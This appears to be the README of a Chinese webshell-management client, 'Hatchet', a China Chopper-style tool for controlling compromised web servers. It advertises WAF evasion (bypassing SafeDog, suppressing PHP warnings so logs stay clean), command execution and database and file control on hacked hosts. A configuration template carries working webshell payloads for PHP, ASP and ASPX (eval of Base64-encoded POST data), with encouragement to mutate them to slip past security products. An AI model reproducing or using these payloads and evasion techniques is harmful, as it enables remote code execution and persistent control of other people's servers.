Home

Awesome

Hatchet VS2005完整源码

免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!

  1. 说明: 我是一个产刀的,用于什么用途,由您自行选择。

  2. 致谢: 菜刀某前辈及各位网友的建议

  3. 弱点: 存在细节方面没处理好 数据库与菜刀有所区别不能共用

  4. 优点: 持续更新 快捷键操作 注册表读取 HTTP头自行控制 POST部分数据可自定义,突破安全狗等WAF(一句话需自行处理) PHP Warning 警告去除,避免某些WAF等记录 PHP支持多种执行命令,安全模式也能执行 PHP管理PostgreSQL、ODBC_MSSQL、PDO_MYSQL、PDO_MSSQL数据库 HTTP代理,只完成PHP。支持HTTP[S] GET POST 文件夹双击进入,树形框的上一层可以点击 支持NTLM验证 COMBO历史记录 支持选择数据库后直接执行SQL命令 数据库右键获取20条记录 支持JSP上传 文件[夹]剪切(文件移动机制秒移) 文件[夹]多选删除 文件[夹]多选下载 应该来说不会崩溃 右键导出数据库查询结果保存TXT,默认每一个字段用一个【TAB】分开,如果需要用其他字符请在填写保存文件名的时候,后面加上&&,紧跟分隔符。如: table.txt&&@@ 数据库执行SQL查询时,直接导出到本地文件,不显示到列表框。SQL命令后面加上--file:紧跟要导出到的文件名。如: Select * From Members Limit 0,20--file:1.txt 支持PHP脚本的数据库管理,远程备份。如: Select * From Members Limit 0,20--save:data.sql--split:@@

  5. 后门: 缩小体积已加UPX壳 绝无有意添加的后门,但三流的业余技能不排除被远程溢出的BUG 文件: C:\Projects\Hatchet\release\Hatchet.exe 大小: 269312 字节 文件版本: 1.0.0.1 修改时间: 2014年8月26日, 12:19:43 MD5: 91FAA43F3F89083F2E9C78D05E13673C SHA1: A1B598CB4EB47554E6F191A7EB33111F462C77FD CRC32: C094BD42

	/*
		[Header]
		User-Agent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
		Referer=1
		X-Forwarded-For=1
		[/Header]
		[Headers]
		Accept-Language: en-us
		Content-Type: application/x-www-form-urlencoded
		[/Headers]
		[POST]
		ASP_POST_DATA==Execute("Execute(""On+Error+Resume+Next:Response.Clear:

		ASPX_POST_DATA==Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(%nPageCode%).GetString(System.Convert.FromBase64String("%szBase64EvalCode%")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();

		PHP_POST_DATA==@eval(base64_decode($_POST[z0]));&z0=

		PHP_POST_Z0_DATA=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);
		[/POST]

		##################################################
		#以下是说明
		请严格保持该格式,大小写不一样
		Referer 为1 则程序自动添加
		X-Forwarded-For 为1 则程序自动随机生成添加
		如果要自己手动添加其固定值,请设为0,后在[Headers]里添加即可。
		[POST]里为POST的部分数据,可自行变异这段代码,过安全狗等,很灵活的哦~
		%nPageCode% 为程序需要处理的编码,请保留
		%szBase64EvalCode% 为程序需要处理的执行代码,请保留
	*/

2013.12.03

2013.12.07

2013.12.09

2013.12.10

2013.12.11

2013.12.12

2013.12.13

2013.12.18

2013.12.19

2013.12.21

2013.12.23

2013.12.24

2013.12.27

2013.12.29

2014.01.04

2014.01.07

2014.01.08

2014.01.09

2014.01.10

2014.01.14 感谢luoye

2014.01.24

2014.02.11

2014.02.21

2014.02.22

2014.03.05

2014.03.17

2014.03.18

2014.04.01

2014.04.02

2014.04.04

2014.04.07

2014.04.14

2014.05.07

2014.05.09

2014.05.21

2014.06.06

2014.07.02

2014.07.07

2014.08.26